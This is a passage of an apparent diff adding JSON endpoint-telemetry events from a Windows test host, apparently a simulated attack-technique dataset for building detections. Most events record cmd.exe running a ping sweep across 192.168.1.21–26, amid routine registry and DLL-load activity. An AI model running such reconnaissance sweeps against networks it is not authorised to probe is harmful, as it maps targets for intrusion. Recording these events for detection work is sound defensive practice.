"HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime\\SecureTimeConfidence", + "registry_value": "SecureTimeConfidence", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeHigh", + "registry_value": "SecureTimeHigh", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeEstimated", + "registry_value": "SecureTimeEstimated", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeLow", + "registry_value": "SecureTimeLow", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", + "registry_value": "RunTime", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime\\SecureTimeTickCount", + "registry_value": "SecureTimeTickCount", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime\\SecureTimeConfidence", + "registry_value": "SecureTimeConfidence", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "process", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572086830000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.21", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6828, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "process", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572091990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.22", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4740, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\SettingsRequests", + "registry_value": "SettingsRequests", + "timestamp": 131883572094330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\SettingsRequests", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\SettingsRequests\\LastDownloadTime", + "registry_value": "LastDownloadTime", + "timestamp": 131883572094330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "file", + "file_name": "e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", + "file_path": "C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "timestamp": 131883572094330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "file", + "file_name": "e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", + "file_path": "C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "timestamp": 131883572094330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "process", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572096830000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.23", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5812, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572096980000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "process", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572101840000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.24", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7672, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572101980000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "process", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572106830000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.25", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7552, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\BITS", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\BITS\\Start", + "registry_value": "Start", + "timestamp": 131883572107770000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", + "timestamp": 131883572108080000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS\\PerfMMFileName", + "registry_value": "PerfMMFileName", + "timestamp": 131883572108080000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "process", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "subtype": "terminate", + "timestamp": 131883572108080000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "process", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572111840000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.26", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6840, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572111980000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": 